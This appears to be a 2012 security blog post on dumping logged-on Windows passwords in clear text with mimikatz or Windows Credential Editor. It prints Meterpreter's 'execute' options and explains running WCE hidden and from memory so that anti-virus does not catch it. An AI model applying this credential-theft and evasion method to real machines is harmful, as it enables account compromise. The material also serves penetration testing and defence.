Archive for July, 2012

If you haven’t heard, there’s a tool that was released a little over a year now, with little fan fair, that can dump all logged on credentials in clear text. It’s called mimikatz. Passing the Hash is fun, but you can’t beat a good clear text password. Am I right? You can download the executable and dependent DLL from Benjamin’s (the author) site, as well as view a detailed explanation of how it works from his presentation at PHDays 2012. I figured I would finally check this tool out and see what it has to offer. A little Googling around and I found a post on PaulDotCom detailing how to upload and execute the tool through a Meterpreter session. One potential problem with this method is that it can easily be stopped by anti-virus as soon as it hits the disk. Mubix is currently working on a solution to implement the function of mimikatz directly into the Metasploit Framework. I think everyone looks forward to this addition. In the meantime, there is another way to dump clear text passwords within a Meterpreter session without ever touching the disk. First, Hernan Ochoa from Amplia Security has updated his tool, Windows Credential Editor (WCE), to also dump clear text passwords. It’s currently in beta, and hasn’t been added to the BackTrack repository yet, so we’ll have to download it from Amplia Security’s site directly. Next, all we need to do is use Meterpreter’s “execute” function to inject our executable directly into memory of the remote machine and run it to dump the passwords for us. Egyp7, one of the Metasploit Framework developers, wrote a post a couple of months ago showing us just how to do this. Let’s look at our Meterpreter “execute” options:

meterpreter > execute
Usage: execute -f file [options]
Executes a command on the remote machine.
OPTIONS:
-H Create the process hidden from view.
-a <opt> The arguments to pass to the command.
-c Channelized I/O (required for interaction).
-d <opt> The 'dummy' executable to launch when using -m.
-f <opt> The executable command to run.
-h Help menu.
-i Interact with the process after creating it.
-k Execute process on the meterpreters current desktop
-m Execute from memory.
-s <opt> Execute process in a given session as the session user
-t Execute process with currently impersonated thread token

We’re simply going to use Meterpreter’s “-H” option to create a hidden process, “-m” to execute the process from memory, and the “-a” option to send the arguments to WCE that are needed to dump the clear text passwords and output them to a file.